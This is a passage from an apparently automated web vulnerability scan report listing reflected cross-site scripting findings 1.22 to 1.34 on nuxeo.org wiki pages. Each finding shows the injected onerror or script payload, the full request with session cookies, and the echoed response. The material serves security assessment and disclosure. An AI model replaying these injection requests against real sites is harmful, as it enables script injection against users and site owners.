"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainf83de%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5f41d66ee78/WebHome?format=xar&amp;name=Mainf83de"><img src=a onerror=alert(1)>5f41d66ee78.WebHome&amp;pages=Mainf83de">
...[SNIP]...

1.22. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6 was submitted in the REST URL parameter 4. This input was echoed as a777f<img src=a onerror=alert(1)>bb226e90ef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Maina777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12792
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina777f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebb226e90ef6/">Maina777f<img src=a onerror=alert(1)>bb226e90ef6</a>
...[SNIP]...

1.23. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 was submitted in the REST URL parameter 5. This input was echoed as c8f16"><img src=a onerror=alert(1)>124352d5031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomec8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebHomec8f16%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E124352d5031?format=xar&amp;name=Main.WebHomec8f16"><img src=a onerror=alert(1)>124352d5031&amp;pages=Main.WebHomec8f16">
...[SNIP]...

1.24. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac was submitted in the REST URL parameter 5. This input was echoed as f6f73<img src=a onerror=alert(1)>f496e7fa5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomef6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebHomef6f73%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef496e7fa5ac'>WebHomef6f73<img src=a onerror=alert(1)>f496e7fa5ac</a>
...[SNIP]...

1.25. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba was submitted in the REST URL parameter 4. This input was echoed as e3ebd<img src=a onerror=alert(1)>55b90c707ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinse3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12813
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinse3ebd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E55b90c707ba/">skinse3ebd<img src=a onerror=alert(1)>55b90c707ba</a>
...[SNIP]...

1.26. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d was submitted in the REST URL parameter 4. This input was echoed as fef32"><img src=a onerror=alert(1)>d71e73a5f1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinsfef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12879
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsfef32%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed71e73a5f1d/toucan?format=xar&amp;name=skinsfef32"><img src=a onerror=alert(1)>d71e73a5f1d.toucan&amp;pages=skinsfef32">
...[SNIP]...

1.27. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 was submitted in the REST URL parameter 5. This input was echoed as 68a4f"><img src=a onerror=alert(1)>9a7616758c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan68a4f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9a7616758c8?format=xar&amp;name=skins.toucan68a4f"><img src=a onerror=alert(1)>9a7616758c8&amp;pages=skins.toucan68a4f">
...[SNIP]...

1.28. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 was submitted in the REST URL parameter 5. This input was echoed as 41c04<img src=a onerror=alert(1)>a6287896c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucan41c04%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea6287896c27'>toucan41c04<img src=a onerror=alert(1)>a6287896c27</a>
...[SNIP]...

1.29. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/login/XWiki/XWikiLogin

Issue detail

The value of the xredirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e135"><script>alert(1)</script>f943fd1f5a1 was submitted in the xredirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xwiki/bin/login/XWiki/XWikiLogin?xredirect=http%3A%2F%2Fwww.nuxeo.org%2Fxwiki%2Fbin%2Fview%2FMain%2F3e135"><script>alert(1)</script>f943fd1f5a1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 401 Unauthorized
Date: Mon, 15 Nov 2010 14:17:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13229
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<input type="hidden" name="xredirect" value="http://www.nuxeo.org/xwiki/bin/view/Main/3e135"><script>alert(1)</script>f943fd1f5a1" />
...[SNIP]...

1.30. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c was submitted in the REST URL parameter 4. This input was echoed as 458d1<img src=a onerror=alert(1)>8dd7e8dd01c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13999
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki458d1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8dd7e8dd01c/">XWiki458d1<img src=a onerror=alert(1)>8dd7e8dd01c</a>
...[SNIP]...

1.31. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec was submitted in the REST URL parameter 4. This input was echoed as 63e7a"><img src=a onerror=alert(1)>c726e3e58ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14065
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki63e7a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec726e3e58ec/Register?format=xar&amp;name=XWiki63e7a"><img src=a onerror=alert(1)>c726e3e58ec.Register&amp;pages=XWiki63e7a">
...[SNIP]...

1.32. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b was submitted in the REST URL parameter 5. This input was echoed as 7501a"><img src=a onerror=alert(1)>a1cd787231b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Register7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14049
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Register7501a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea1cd787231b?format=xar&amp;name=XWiki.Register7501a"><img src=a onerror=alert(1)>a1cd787231b&amp;pages=XWiki.Register7501a">
...[SNIP]...

1.33. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d was submitted in the REST URL parameter 5. This input was echoed as ba825<img src=a onerror=alert(1)>650a8396e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Registerba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:20:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13987
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Registerba825%3Cimg+src%3Da+onerror%3Dalert%281%29%3E650a8396e8d'>Registerba825<img src=a onerror=alert(1)>650a8396e8d</a>
...[SNIP]...

1.34. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee was submitted in the REST URL parameter 4. This input was echoed as 8dc28<img src=a onerror=alert(1)>e5ffb44f0ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close
